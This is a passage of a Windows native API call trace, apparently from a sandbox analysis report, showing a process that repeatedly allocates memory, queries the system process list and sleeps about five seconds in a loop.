RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.785] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.794] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.807] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.814] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.821] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.829] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.843] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.850] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.871] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.878] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.888] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.895] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.902] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.911] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.948] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0230.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0230.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0230.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0230.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0230.955] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0230.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0230.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 